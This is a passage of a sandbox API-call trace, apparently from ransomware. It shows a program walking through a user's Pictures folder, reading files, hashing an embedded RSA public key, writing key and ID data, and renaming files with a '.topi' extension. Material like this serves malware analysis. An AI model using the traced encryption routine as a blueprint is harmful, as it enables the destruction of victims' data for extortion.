[0095.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9468 | out: hHeap=0x680000) returned 1 [0095.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.345] GetCurrentThreadId () returned 0x8c4 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6070 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.346] GetCurrentThreadId () returned 0x8c4 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9468 [0095.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9480 [0095.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9450 [0095.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9498 [0095.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0095.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9468 | out: hHeap=0x680000) returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9468 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9468 | out: hHeap=0x680000) returned 1 [0095.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9498 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9480 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9450 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9438 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1b60 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.349] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x12c79, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x12c79, lpOverlapped=0x0) returned 1 [0095.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.350] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x12c7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.350] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.350] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.350] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.350] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.350] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.351] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.351] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.351] CloseHandle (hObject=0x6a8) returned 1 [0095.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0095.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.357] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8Rw8e.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8rw8e.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8Rw8e.bmp.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8rw8e.bmp.topi")) returned 1 [0095.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.358] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.358] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.359] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7656a30, ftCreationTime.dwHighDateTime=0x1d5c28e, ftLastAccessTime.dwLowDateTime=0xa3c5a3d0, ftLastAccessTime.dwHighDateTime=0x1d5c4ae, ftLastWriteTime.dwLowDateTime=0xa3c5a3d0, ftLastWriteTime.dwHighDateTime=0x1d5c4ae, nFileSizeHigh=0x0, nFileSizeLow=0x8603, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aji-jvy.png", cAlternateFileName="")) returned 1 [0095.359] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.359] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.359] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aji-jvy.png") returned=".png" [0095.359] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aji-jvy.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aji-jvy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.359] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=34307) returned 1 [0095.359] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.363] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x85dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.363] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.364] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.364] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.364] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.364] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x8603, lpOverlapped=0x0) returned 1 [0095.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.365] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.365] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.366] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.366] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.366] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.366] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.366] GetLastError () returned 0x0 [0095.366] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.366] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.366] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.366] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.366] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.367] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8600) returned 0x99f72d8 [0095.381] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.382] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1b60 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9438 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1ba8 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9450 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9480 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9498 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.382] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.382] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9480 | out: hHeap=0x680000) returned 1 [0095.382] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9498 | out: hHeap=0x680000) returned 1 [0095.382] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.382] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.382] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9498 [0095.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9480 [0095.383] RtlAllocateHeap 